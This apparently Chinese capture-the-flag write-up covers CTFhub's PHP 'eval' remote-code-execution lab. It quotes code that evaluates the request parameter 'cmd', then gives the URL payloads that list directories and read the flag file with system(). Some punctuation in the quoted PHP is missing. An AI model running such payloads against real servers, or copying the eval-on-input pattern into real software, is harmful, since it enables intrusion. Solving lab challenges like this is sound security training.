CTFhub-RCE-evel执行

访问目标地址:

<?php

if (isset($_REQUEST'cmd')) {

eval($_REQUEST"cmd");

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
alxraves8 分钟前
医用超声远程会诊系统:会诊平台的核心架构与功能解析
java·人工智能·架构
带刺的坐椅8 分钟前
用 Solon AI ReActAgent 落地智能客服工单处理
java·ai·llm·agent·solon·react-agent
我是坏垠43 分钟前
Crypto、Cipher与Password:Java加密开发的三个核心概念
java·开发语言·python
invicinble1 小时前
c端系统,其实更像一个信息展示平台
前端
white_ant1 小时前
JDK LTS 版本升级迁移注意事项大全
java·开发语言
李姆斯2 小时前
管理是否可以被完全量化
前端·产品经理·团队管理
名字还没想好☜2 小时前
Next.js 中间件实战:鉴权、重定向与 A/B 分流
开发语言·前端·javascript·中间件·react·next.js
广州灵眸科技有限公司3 小时前
瑞芯微RV1126B开发板(EASY-EAI-PI2) INI文件操作
java·前端·javascript·网络·人工智能
库克克3 小时前
【C++ 】内联函数
java·开发语言·c++
zh_xuan3 小时前
java 虚拟线程
java·开发语言·虚拟线程